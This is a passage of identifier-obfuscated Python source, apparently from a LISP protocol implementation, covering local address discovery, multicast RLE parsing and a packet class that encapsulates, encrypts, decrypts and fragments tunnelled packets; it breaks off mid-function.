if ( IIiiI . has_key ( netifaces . AF_INET ) ) :
ooOo000OoO0o = IIiiI [ netifaces . AF_INET ]
I1I1 = 0
for o0o00O0oOooO0 in ooOo000OoO0o :
i1iii1IiiiI1i1 . store_address ( o0o00O0oOooO0 [ "addr" ] )
if ( i1iii1IiiiI1i1 . is_ipv4_loopback ( ) ) : continue
if ( i1iii1IiiiI1i1 . is_ipv4_link_local ( ) ) : continue
if ( i1iii1IiiiI1i1 . address == 0 ) : continue
I1I1 += 1
i1iii1IiiiI1i1 . instance_id = IIi11iII11i1
if ( O0O0 == None and
lisp_db_for_lookups . lookup_cache ( i1iii1IiiiI1i1 , False ) ) : continue
ooOOo [ 0 ] = i1iii1IiiiI1i1
if ( I1I1 == ooo ) : break
if 78 - 78: I11i . OOooOOo + oO0o * iII111i - i1IIi
if 27 - 27: Ii1I % i1IIi . Oo0Ooo % I1Ii111
if ( IIiiI . has_key ( netifaces . AF_INET6 ) ) :
ooooo0O0 = IIiiI [ netifaces . AF_INET6 ]
I1I1 = 0
for o0o00O0oOooO0 in ooooo0O0 :
oo0o00OO = o0o00O0oOooO0 [ "addr" ]
IIIiI1i1 . store_address ( oo0o00OO )
if ( IIIiI1i1 . is_ipv6_string_link_local ( oo0o00OO ) ) : continue
if ( IIIiI1i1 . is_ipv6_loopback ( ) ) : continue
I1I1 += 1
IIIiI1i1 . instance_id = IIi11iII11i1
if ( O0O0 == None and
lisp_db_for_lookups . lookup_cache ( IIIiI1i1 , False ) ) : continue
ooOOo [ 1 ] = IIIiI1i1
if ( I1I1 == ooo ) : break
if 10 - 10: IiII / OoooooooOO
if 50 - 50: i11iIiiIii - OoooooooOO . oO0o + O0 . i1IIi
if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
if 25 - 25: iIii1I11I1II1
if 63 - 63: ooOoO0o
if 96 - 96: I11i
if ( ooOOo [ 0 ] == None ) : continue
if 34 - 34: OoOoOO00 / OoO0O00 - I1IiiI . O0 . OOooOOo
ooOOo [ 2 ] = OoO0o0OOOO
break
if 63 - 63: iII111i
if 11 - 11: iII111i - iIii1I11I1II1
ooOo0O0 = ooOOo [ 0 ] . print_address_no_iid ( ) if ooOOo [ 0 ] else "none"
ooo0 = ooOOo [ 1 ] . print_address_no_iid ( ) if ooOOo [ 1 ] else "none"
OoO0o0OOOO = ooOOo [ 2 ] if ooOOo [ 2 ] else "none"
if 36 - 36: I1Ii111 . IiII * OoooooooOO - o0oOOo0O0Ooo
O0O0 = " (user selected)" if O0O0 != None else ""
if 60 - 60: OOooOOo . iII111i / iIii1I11I1II1 + OOooOOo * I1Ii111
ooOo0O0 = red ( ooOo0O0 , False )
ooo0 = red ( ooo0 , False )
OoO0o0OOOO = bold ( OoO0o0OOOO , False )
lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( ooOo0O0 , ooo0 , OoO0o0OOOO , O0O0 , IIi11iII11i1 ) )
if 82 - 82: i11iIiiIii . iIii1I11I1II1 * I1IiiI - I11i + Ii1I
if 48 - 48: I1ii11iIi11i
lisp_myrlocs = ooOOo
return ( ( ooOOo [ 0 ] != None ) )
if 96 - 96: ooOoO0o . OoooooooOO
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
if 88 - 88: Oo0Ooo
def lisp_get_all_addresses ( ) :
i1ii111i = [ ]
for II1i in netifaces . interfaces ( ) :
try : i1ii1i1Ii11 = netifaces . ifaddresses ( II1i )
except : continue
if 88 - 88: I1Ii111 % I11i - OoooooooOO + ooOoO0o
if ( i1ii1i1Ii11 . has_key ( netifaces . AF_INET ) ) :
for o0o00O0oOooO0 in i1ii1i1Ii11 [ netifaces . AF_INET ] :
oO0OO = o0o00O0oOooO0 [ "addr" ]
if ( oO0OO . find ( "127.0.0.1" ) != - 1 ) : continue
i1ii111i . append ( oO0OO )
if 53 - 53: i1IIi . i1IIi - I11i / iII111i - OoOoOO00 % I1IiiI
if 65 - 65: iII111i . OoooooooOO - O0 . iII111i - i11iIiiIii
if ( i1ii1i1Ii11 . has_key ( netifaces . AF_INET6 ) ) :
for o0o00O0oOooO0 in i1ii1i1Ii11 [ netifaces . AF_INET6 ] :
oO0OO = o0o00O0oOooO0 [ "addr" ]
if ( oO0OO == "::1" ) : continue
if ( oO0OO [ 0 : 5 ] == "fe80:" ) : continue
i1ii111i . append ( oO0OO )
if 29 - 29: I1ii11iIi11i . I1IiiI % oO0o - i11iIiiIii
if 27 - 27: I1ii11iIi11i - i11iIiiIii % I1Ii111 / Oo0Ooo . Oo0Ooo / OoooooooOO
if 76 - 76: I11i * OoO0O00 . iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
return ( i1ii111i )
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if 79 - 79: O0
if 32 - 32: II111iiii . O0 + Ii1I / OoOoOO00 / IiII / OOooOOo
if 15 - 15: I1ii11iIi11i
def lisp_get_all_multicast_rles ( ) :
I11iI1 = [ ]
II1IIiiI1 = commands . getoutput ( 'egrep "rle-address =" ./lisp.config' )
if ( II1IIiiI1 == "" ) : return ( I11iI1 )
if 96 - 96: o0oOOo0O0Ooo % IiII / OOooOOo
Oo0o0ooOoO = II1IIiiI1 . split ( "\n" )
for oOOo0ooO0 in Oo0o0ooOoO :
if ( oOOo0ooO0 [ 0 ] == "#" ) : continue
iI1Ii11 = oOOo0ooO0 . split ( "rle-address = " ) [ 1 ]
Ooo0 = int ( iI1Ii11 . split ( "." ) [ 0 ] )
if ( Ooo0 >= 224 and Ooo0 < 240 ) : I11iI1 . append ( iI1Ii11 )
if 49 - 49: II111iiii + OoooooooOO . oO0o + i11iIiiIii / oO0o
return ( I11iI1 )
if 39 - 39: OoO0O00 + O0 + ooOoO0o * II111iiii % O0 - O0
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
if 39 - 39: Ii1I
if 60 - 60: OOooOOo
if 62 - 62: I1Ii111 * I11i
if 74 - 74: OoOoOO00 . iIii1I11I1II1
class lisp_packet ( ) :
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
if 87 - 87: ooOoO0o
if 41 - 41: OoOoOO00 . iIii1I11I1II1 % ooOoO0o + O0
def encode ( self , nonce ) :
if 22 - 22: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o + I1ii11iIi11i * iII111i . i11iIiiIii
if 90 - 90: OOooOOo * OoOoOO00 - Oo0Ooo + o0oOOo0O0Ooo
if 53 - 53: OoooooooOO . OoooooooOO + o0oOOo0O0Ooo - iII111i + OOooOOo
if 44 - 44: I1Ii111 - IiII
if 100 - 100: oO0o . OoO0O00 - Ii1I + O0 * OoO0O00
if ( self . outer_source . is_null ( ) ) : return ( None )
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if ( nonce == None ) :
self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
self . lisp_header . request_nonce ( nonce )
else :
self . lisp_header . nonce ( nonce )
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
self . lisp_header . instance_id ( self . inner_dest . instance_id )
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
if 79 - 79: II111iiii - oO0o * I1ii11iIi11i - OoOoOO00 . I1ii11iIi11i
self . lisp_header . key_id ( 0 )
iiII1IIii1i1 = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
if ( lisp_data_plane_security and iiII1IIii1i1 == False ) :
oo0o00OO = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
if 38 - 38: iII111i * OoooooooOO
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oo0o00OO ) ) :
iIi11III = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( iIi11III [ 1 ] ) :
iIi11III [ 1 ] . use_count += 1
IiiiIi1iiii11 , iIIi1IIIii11i = self . encrypt ( iIi11III [ 1 ] , oo0o00OO )
if ( iIIi1IIIii11i ) : self . packet = IiiiIi1iiii11
if 40 - 40: I1IiiI % ooOoO0o % IiII + OoO0O00
if 75 - 75: oO0o - I1ii11iIi11i + oO0o + OoooooooOO . i11iIiiIii
if 52 - 52: iII111i / ooOoO0o - i11iIiiIii + OoooooooOO
if 33 - 33: O0 + Oo0Ooo - iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
if 86 - 86: IiII
if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
if 33 - 33: II111iiii - IiII - ooOoO0o
self . udp_checksum = 0
if ( self . encap_port == LISP_DATA_PORT ) :
if ( lisp_crypto_ephem_port == None ) :
if ( self . gleaned_dest ) :
self . udp_sport = LISP_DATA_PORT
else :
self . hash_packet ( )
if 92 - 92: OoO0O00 * IiII
else :
self . udp_sport = lisp_crypto_ephem_port
if 92 - 92: oO0o
else :
self . udp_sport = LISP_DATA_PORT
if 7 - 7: iII111i
self . udp_dport = self . encap_port
self . udp_length = len ( self . packet ) + 16
if 73 - 73: OoO0O00 % I1ii11iIi11i
if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
if 62 - 62: i11iIiiIii
if 2 - 2: I1IiiI
if ( self . outer_version == 4 ) :
oo0O = socket . htons ( self . udp_sport )
O0o0o0ooO0ooo = socket . htons ( self . udp_dport )
else :
oo0O = self . udp_sport
O0o0o0ooO0ooo = self . udp_dport
if 47 - 47: IiII
if 76 - 76: OoO0O00 * iIii1I11I1II1 + I1ii11iIi11i - ooOoO0o - I11i / i1IIi
O0o0o0ooO0ooo = socket . htons ( self . udp_dport ) if self . outer_version == 4 else self . udp_dport
if 27 - 27: I1ii11iIi11i . IiII
if 66 - 66: O0 / O0 * i1IIi . OoooooooOO % iIii1I11I1II1
oOoO0OOO00O = struct . pack ( "HHHH" , oo0O , O0o0o0ooO0ooo , socket . htons ( self . udp_length ) ,
self . udp_checksum )
if 21 - 21: IiII - I1IiiI % OoooooooOO + o0oOOo0O0Ooo
if 92 - 92: ooOoO0o + IiII
if 52 - 52: II111iiii / I1IiiI . oO0o * IiII . I11i
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
iI1iIIII1 = self . lisp_header . encode ( )
if 65 - 65: O0 / II111iiii . iIii1I11I1II1 . oO0o / Oo0Ooo % iIii1I11I1II1
if 74 - 74: i1IIi / I1IiiI % I1ii11iIi11i / O0 % I11i - OoOoOO00
if 31 - 31: I1IiiI / OoooooooOO . iIii1I11I1II1 * OoOoOO00 . OoooooooOO + II111iiii
if 8 - 8: I1ii11iIi11i * I1ii11iIi11i * i1IIi + iII111i . I1ii11iIi11i
if 100 - 100: OoooooooOO - O0 . I11i / I11i + II111iiii * OoOoOO00
if ( self . outer_version == 4 ) :
i11111 = socket . htons ( self . udp_length + 20 )
o0o00OoOo0 = socket . htons ( 0x4000 )
oo0O0000O0 = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , i11111 , 0xdfdf ,
o0o00OoOo0 , self . outer_ttl , 17 , 0 )
oo0O0000O0 += self . outer_source . pack_address ( )
oo0O0000O0 += self . outer_dest . pack_address ( )
oo0O0000O0 = lisp_ip_checksum ( oo0O0000O0 )
elif ( self . outer_version == 6 ) :
oo0O0000O0 = ""
if 53 - 53: IiII % Oo0Ooo
if 42 - 42: i11iIiiIii / I1IiiI - OoO0O00 - ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
if 5 - 5: O0 - I1IiiI
if 44 - 44: II111iiii . II111iiii + OOooOOo * Ii1I
if 16 - 16: II111iiii
if 100 - 100: O0 - i1IIi
else :
return ( None )
if 48 - 48: oO0o % ooOoO0o + O0
if 27 - 27: I1ii11iIi11i / OOooOOo
self . packet = oo0O0000O0 + oOoO0OOO00O + iI1iIIII1 + self . packet
return ( self )
if 33 - 33: OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
def cipher_pad ( self , packet ) :
oOOoO0O = len ( packet )
if ( ( oOOoO0O % 16 ) != 0 ) :
OoOoO = ( ( oOOoO0O / 16 ) + 1 ) * 16
packet = packet . ljust ( OoOoO )
if 57 - 57: Oo0Ooo % OoO0O00
return ( packet )
if 1 - 1: OoOoOO00 * O0 . oO0o % O0 + II111iiii
if 49 - 49: I11i . OOooOOo
def encrypt ( self , key , addr_str ) :
if ( key == None or key . shared_key == None ) :
return ( [ self . packet , False ] )
if 74 - 74: i1IIi
if 15 - 15: i1IIi + IiII % I1IiiI / i11iIiiIii * OoOoOO00
if 69 - 69: i11iIiiIii
if 61 - 61: O0
if 21 - 21: OoO0O00 % iIii1I11I1II1 . OoO0O00
IiiiIi1iiii11 = self . cipher_pad ( self . packet )
OO000OOOo0Oo = key . get_iv ( )
if 75 - 75: II111iiii + ooOoO0o % OOooOOo + Oo0Ooo
i1 = lisp_get_timestamp ( )
oOoOOoo = None
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
Oo00O0o0O = chacha . ChaCha ( key . encrypt_key , OO000OOOo0Oo ) . encrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
O0OoOO = binascii . unhexlify ( key . encrypt_key )
try :
o0o0oO0OOO = AES . new ( O0OoOO , AES . MODE_GCM , OO000OOOo0Oo )
Oo00O0o0O = o0o0oO0OOO . encrypt
oOoOOoo = o0o0oO0OOO . digest
except :
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ self . packet , False ] )
if 66 - 66: Ii1I * iIii1I11I1II1 - ooOoO0o / I1IiiI
else :
O0OoOO = binascii . unhexlify ( key . encrypt_key )
Oo00O0o0O = AES . new ( O0OoOO , AES . MODE_CBC , OO000OOOo0Oo ) . encrypt
if 62 - 62: IiII . O0 . iIii1I11I1II1
if 94 - 94: ooOoO0o % I11i % i1IIi
o0OoOo0o0O00 = Oo00O0o0O ( IiiiIi1iiii11 )
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if ( o0OoOo0o0O00 == None ) : return ( [ self . packet , False ] )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
if 55 - 55: OoooooooOO
if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
if 38 - 38: O0
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
if ( oOoOOoo != None ) : o0OoOo0o0O00 += oOoOOoo ( )
if 71 - 71: IiII
if 97 - 97: I1ii11iIi11i
if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
self . lisp_header . key_id ( key . key_id )
iI1iIIII1 = self . lisp_header . encode ( )
if 28 - 28: i11iIiiIii
Oo00oo0 = key . do_icv ( iI1iIIII1 + OO000OOOo0Oo + o0OoOo0o0O00 , OO000OOOo0Oo )
if 82 - 82: OOooOOo * I1ii11iIi11i % Ii1I . OOooOOo
iI1oOoo = 4 if ( key . do_poly ) else 8
if 59 - 59: IiII % Ii1I
O0ooo = bold ( "Encrypt" , False )
IiIIiII1I = bold ( key . cipher_suite_string , False )
addr_str = "RLOC: " + red ( addr_str , False )
o00oOOo0Oo = "poly" if key . do_poly else "sha256"
o00oOOo0Oo = bold ( o00oOOo0Oo , False )
Oooo0o0oO = "ICV({}): 0x{}...{}" . format ( o00oOOo0Oo , Oo00oo0 [ 0 : iI1oOoo ] , Oo00oo0 [ - iI1oOoo : : ] )
dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( O0ooo , key . key_id , addr_str , Oooo0o0oO , IiIIiII1I , i1 ) )
if 82 - 82: ooOoO0o
if 70 - 70: iIii1I11I1II1 + i11iIiiIii + Oo0Ooo / iII111i
Oo00oo0 = int ( Oo00oo0 , 16 )
if ( key . do_poly ) :
iI1IiiiIi = byte_swap_64 ( ( Oo00oo0 >> 64 ) & LISP_8_64_MASK )
IiI111 = byte_swap_64 ( Oo00oo0 & LISP_8_64_MASK )
Oo00oo0 = struct . pack ( "QQ" , iI1IiiiIi , IiI111 )
else :
iI1IiiiIi = byte_swap_64 ( ( Oo00oo0 >> 96 ) & LISP_8_64_MASK )
IiI111 = byte_swap_64 ( ( Oo00oo0 >> 32 ) & LISP_8_64_MASK )
OO0OO00ooO0 = socket . htonl ( Oo00oo0 & 0xffffffff )
Oo00oo0 = struct . pack ( "QQI" , iI1IiiiIi , IiI111 , OO0OO00ooO0 )
if 68 - 68: OoOoOO00 * I1ii11iIi11i - OoooooooOO - I11i + iIii1I11I1II1 * i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
return ( [ OO000OOOo0Oo + o0OoOo0o0O00 + Oo00oo0 , True ] )
if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
if 49 - 49: O0 / II111iiii * I1IiiI - OoooooooOO . II111iiii % IiII
def decrypt ( self , packet , header_length , key , addr_str ) :
if 13 - 13: oO0o . iIii1I11I1II1 . OOooOOo . IiII
if 58 - 58: I11i
if 7 - 7: II111iiii / IiII % I11i + I1IiiI - O0
if 45 - 45: I1IiiI / iII111i + oO0o + IiII
if 15 - 15: I1IiiI % OoO0O00
if 66 - 66: oO0o * i11iIiiIii . I1Ii111
if ( key . do_poly ) :
iI1IiiiIi , IiI111 = struct . unpack ( "QQ" , packet [ - 16 : : ] )
o0O0OOOo0 = byte_swap_64 ( iI1IiiiIi ) << 64
o0O0OOOo0 |= byte_swap_64 ( IiI111 )
o0O0OOOo0 = lisp_hex_string ( o0O0OOOo0 ) . zfill ( 32 )
packet = packet [ 0 : - 16 ]
iI1oOoo = 4
I1ii1i = bold ( "poly" , False )
else :
iI1IiiiIi , IiI111 , OO0OO00ooO0 = struct . unpack ( "QQI" , packet [ - 20 : : ] )
o0O0OOOo0 = byte_swap_64 ( iI1IiiiIi ) << 96
o0O0OOOo0 |= byte_swap_64 ( IiI111 ) << 32
o0O0OOOo0 |= socket . htonl ( OO0OO00ooO0 )
o0O0OOOo0 = lisp_hex_string ( o0O0OOOo0 ) . zfill ( 40 )
packet = packet [ 0 : - 20 ]
iI1oOoo = 8
I1ii1i = bold ( "sha" , False )
if 51 - 51: OoO0O00 - iII111i % O0 - OoOoOO00
iI1iIIII1 = self . lisp_header . encode ( )
if 53 - 53: iII111i / i1IIi / i1IIi
if 77 - 77: I11i + i1IIi . I11i
if 89 - 89: o0oOOo0O0Ooo + OOooOOo * oO0o
if 45 - 45: iII111i - o0oOOo0O0Ooo . Ii1I
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
Iii = 8
IiIIiII1I = bold ( "chacha" , False )
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
Iii = 12
IiIIiII1I = bold ( "aes-gcm" , False )
else :
Iii = 16
IiIIiII1I = bold ( "aes-cbc" , False )
if 32 - 32: OoO0O00
OO000OOOo0Oo = packet [ 0 : Iii ]
if 99 - 99: Ii1I - IiII * iIii1I11I1II1 . II111iiii
if 56 - 56: iIii1I11I1II1 % OoO0O00 . ooOoO0o % IiII . I1Ii111 * Oo0Ooo
if 41 - 41: iIii1I11I1II1 % IiII * oO0o - ooOoO0o
if 5 - 5: OoO0O00 + OoO0O00 + II111iiii * iIii1I11I1II1 + OoooooooOO
Oo0OOOOOOO0oo = key . do_icv ( iI1iIIII1 + packet , OO000OOOo0Oo )
if 35 - 35: I1ii11iIi11i * OoO0O00 * I1IiiI / OoooooooOO
I1iIIIiiii = "0x{}...{}" . format ( o0O0OOOo0 [ 0 : iI1oOoo ] , o0O0OOOo0 [ - iI1oOoo : : ] )
I1111 = "0x{}...{}" . format ( Oo0OOOOOOO0oo [ 0 : iI1oOoo ] , Oo0OOOOOOO0oo [ - iI1oOoo : : ] )
if 67 - 67: i1IIi
if ( Oo0OOOOOOO0oo != o0O0OOOo0 ) :
self . packet_error = "ICV-error"
O0Oo0oo0O0O0o = IiIIiII1I + "/" + I1ii1i
IIIi111iIi11 = bold ( "ICV failed ({})" . format ( O0Oo0oo0O0O0o ) , False )
Oooo0o0oO = "packet-ICV {} != computed-ICV {}" . format ( I1iIIIiiii , I1111 )
dprint ( ( "{} from RLOC {}, receive-port: {}, key-id: {}, " + "packet dropped, {}" ) . format ( IIIi111iIi11 , red ( addr_str , False ) ,
# II111iiii - oO0o
self . udp_sport , key . key_id , Oooo0o0oO ) )
dprint ( "{}" . format ( key . print_keys ( ) ) )
if 52 - 52: I1IiiI % OoO0O00 * Ii1I * iII111i / OOooOOo
if 88 - 88: oO0o
if 1 - 1: Oo0Ooo
if 95 - 95: OoooooooOO / I11i % OoooooooOO / ooOoO0o * IiII
if 75 - 75: O0
if 56 - 56: OoO0O00 / II111iiii
lisp_retry_decap_keys ( addr_str , iI1iIIII1 + packet , OO000OOOo0Oo , o0O0OOOo0 )
return ( [ None , False ] )
if 39 - 39: OoOoOO00 - OoooooooOO - i1IIi / II111iiii
if 49 - 49: Oo0Ooo + O0 + IiII . II111iiii % ooOoO0o
if 33 - 33: OoOoOO00 . iIii1I11I1II1 / I11i % Ii1I
if 49 - 49: OoO0O00 + II111iiii / IiII - O0 % Ii1I
if 27 - 27: OoO0O00 + Oo0Ooo
packet = packet [ Iii : : ]
if 92 - 92: I1IiiI % iII111i
if 31 - 31: OoooooooOO - oO0o / I1Ii111
if 62 - 62: i11iIiiIii - I11i
if 81 - 81: I11i
i1 = lisp_get_timestamp ( )
if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
OOOOooO0 = chacha . ChaCha ( key . encrypt_key , OO000OOOo0Oo ) . decrypt
elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
O0OoOO = binascii . unhexlify ( key . encrypt_key )
try :
OOOOooO0 = AES . new ( O0OoOO , AES . MODE_GCM , OO000OOOo0Oo ) . decrypt
except :
self . packet_error = "no-decrypt-key"
lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
return ( [ None , False ] )
if 23 - 23: I1IiiI * I11i / i11iIiiIii * I1Ii111 . iIii1I11I1II1
else :
if ( ( len ( packet ) % 16 ) != 0 ) :
dprint ( "Ciphertext not multiple of 16 bytes, packet dropped" )
return ( [ None , False ] )
if 40 - 40: I1IiiI . Ii1I / i1IIi
O0OoOO = binascii . unhexlify ( key . encrypt_key )
OOOOooO0 = AES . new ( O0OoOO , AES . MODE_CBC , OO000OOOo0Oo ) . decrypt
if 28 - 28: Ii1I
if 66 - 66: I11i
i1o0 = OOOOooO0 ( packet )
i1 = int ( str ( time . time ( ) - i1 ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
if 61 - 61: I11i
if 80 - 80: I1IiiI - I1IiiI
if 52 - 52: II111iiii
if 21 - 21: OoOoOO00 - II111iiii
O0ooo = bold ( "Decrypt" , False )
addr_str = "RLOC: " + red ( addr_str , False )
o00oOOo0Oo = "poly" if key . do_poly else "sha256"
o00oOOo0Oo = bold ( o00oOOo0Oo , False )
Oooo0o0oO = "ICV({}): {}" . format ( o00oOOo0Oo , I1iIIIiiii )
dprint ( "{} for key-id: {}, {}, {} (good), {}-time: {} usec" . format ( O0ooo , key . key_id , addr_str , Oooo0o0oO , IiIIiII1I , i1 ) )
if 10 - 10: OoOoOO00 - o0oOOo0O0Ooo * i11iIiiIii / Oo0Ooo + o0oOOo0O0Ooo + iIii1I11I1II1
if 23 - 23: i1IIi + I1ii11iIi11i + I1IiiI - ooOoO0o % OoooooooOO . IiII
if 49 - 49: oO0o . OoOoOO00
if 73 - 73: Ii1I / I1IiiI / OoooooooOO + I1IiiI
if 57 - 57: OOooOOo . Ii1I % o0oOOo0O0Ooo
if 32 - 32: I11i / IiII - O0 * iIii1I11I1II1
if 70 - 70: OoooooooOO % OoooooooOO % OoO0O00
self . packet = self . packet [ 0 : header_length ]
return ( [ i1o0 , True ] )
if 98 - 98: OoO0O00
if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
def fragment_outer ( self , outer_hdr , inner_packet ) :
OOoOoO = 1000
if 72 - 72: OoOoOO00 / I1Ii111 * IiII % iIii1I11I1II1
if 53 - 53: OoO0O00 . O0 . I1IiiI * OOooOOo / o0oOOo0O0Ooo
if 34 - 34: OoOoOO00
if 16 - 16: i1IIi - I1Ii111 - II111iiii
if 83 - 83: I1IiiI - OoO0O00 - o0oOOo0O0Ooo / O0 - I11i . II111iiii
iI1i1Ii111I = [ ]
oO0ooOoO = 0
oOOoO0O = len ( inner_packet )
while ( oO0ooOoO < oOOoO0O ) :
o0o00OoOo0 = inner_packet [ oO0ooOoO : : ]
if ( len ( o0o00OoOo0 ) > OOoOoO ) : o0o00OoOo0 = o0o00OoOo0 [ 0 : OOoOoO ]
iI1i1Ii111I . append ( o0o00OoOo0 )
oO0ooOoO += len ( o0o00OoOo0 )
if 17 - 17: O0 * iIii1I11I1II1 % IiII . IiII / O0
if 52 - 52: I1IiiI - iIii1I11I1II1 - I1ii11iIi11i
if 38 - 38: I1IiiI + o0oOOo0O0Ooo - IiII
if 85 - 85: iII111i * iII111i % OoOoOO00 - OOooOOo % OoO0O00 - I1IiiI
if 3 - 3: OOooOOo + i1IIi % I1ii11iIi11i
if 100 - 100: OoooooooOO + i11iIiiIii % o0oOOo0O0Ooo + I1IiiI . Oo0Ooo . II111iiii
OoiiI11111II = [ ]
oO0ooOoO = 0
for o0o00OoOo0 in iI1i1Ii111I :
if 48 - 48: iII111i % i11iIiiIii . OoooooooOO * IiII % OoO0O00 . iII111i
if 6 - 6: O0 . ooOoO0o - oO0o / i11iIiiIii
if 84 - 84: I11i / I1ii11iIi11i * o0oOOo0O0Ooo * OoO0O00 * OOooOOo * O0
if 83 - 83: O0 % II111iiii + o0oOOo0O0Ooo / OoooooooOO
Ooi1IIii1i = oO0ooOoO if ( o0o00OoOo0 == iI1i1Ii111I [ - 1 ] ) else 0x2000 + oO0ooOoO
Ooi1IIii1i = socket . htons ( Ooi1IIii1i )
outer_hdr = outer_hdr [ 0 : 6 ] + struct . pack ( "H" , Ooi1IIii1i ) + outer_hdr [ 8 : : ]
if 60 - 60: Ii1I % Oo0Ooo / I11i . iII111i / I1Ii111 - OoooooooOO
if 76 - 76: O0
if 71 - 71: I1IiiI . i1IIi
if 19 - 19: II111iiii / II111iiii % I1ii11iIi11i + oO0o + oO0o + iII111i
IIi1I1 = socket . htons ( len ( o0o00OoOo0 ) + 20 )
outer_hdr = outer_hdr [ 0 : 2 ] + struct . pack ( "H" , IIi1I1 ) + outer_hdr [ 4 : : ]
outer_hdr = lisp_ip_checksum ( outer_hdr )
OoiiI11111II . append ( outer_hdr + o0o00OoOo0 )
oO0ooOoO += len ( o0o00OoOo0 ) / 8
if 80 - 80: o0oOOo0O0Ooo % iII111i
return ( OoiiI11111II )
if 80 - 80: Ii1I
if 26 - 26: iIii1I11I1II1 . OoooooooOO - iIii1I11I1II1
def send_icmp_too_big ( self , inner_packet ) :
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
if 59 - 59: I1ii11iIi11i + I11i . oO0o
Ooo0o0oo0 = time . time ( ) - lisp_last_icmp_too_big_sent
if ( Ooo0o0oo0 < LISP_ICMP_TOO_BIG_RATE_LIMIT ) :
